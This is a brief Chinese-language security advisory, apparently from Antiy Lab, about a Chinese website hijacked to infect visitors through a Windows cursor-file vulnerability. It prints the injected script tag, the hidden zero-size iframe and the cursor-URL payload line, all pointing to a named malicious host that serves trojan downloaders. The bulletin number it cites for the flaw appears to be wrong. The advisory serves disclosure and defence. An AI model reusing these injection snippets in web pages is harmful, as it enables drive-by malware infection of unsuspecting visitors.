东方卫士网站挂马事件

   3月30日，安天实验室反病毒监测网发现，东方卫士网站(www.i110.com)被黑客植入病毒，用户如果访问该网站，会被病毒感染。此次攻击中，攻击者利用了新出现的微软光标和图标格式文件处理远程代码执行漏洞，安天实验室CERT认为，在今后的一段时间内，使用该漏洞进行攻击的恶意事件，可能增多。对此应该引起警惕。

　　攻击者利用MS06-014漏洞来传播木马，该网站的主页上，被添加了如下代码：

<script language="JavaScript" src="http://www.m5k8.com/dm.js"></script>
<iframe src=http://www.m5k8.com/la1.htm?id=0037 width=0 height=0 frameborder=0></iframe>

      用户访问该网站时，系统会在用户不知情的情况下，访问带毒网页。
　　
　　在恶意脚本http://www.m5k8.com/dm.js（服务器地址为219.153.49.51）中包含如下代码：

document.write("<DIV style=/"CURSOR: url('http://www.m5k8.com/logo.jpg')/"></DIV>");

     利用了新出现的微软光标和图标格式文件处理远程代码执行漏洞。使的系统自动下载http://www.m5k8.com/logo.jpg（Trojan-Downloader.Win32.Ani.g）到本地，并运行。

　　 一旦运行，该木马将下载http://www.m5k8.com/down.exe到用户的系统，并运行。

　　微软光标和图标格式文件处理远程代码执行漏洞的起因是Microsoft公司多个版本的操作系统处理畸形光标、动画光标或图标文件时，会导致内存溢出，导致可以执行任意指令，使的远程攻击者可以利用此漏洞控制用户机器。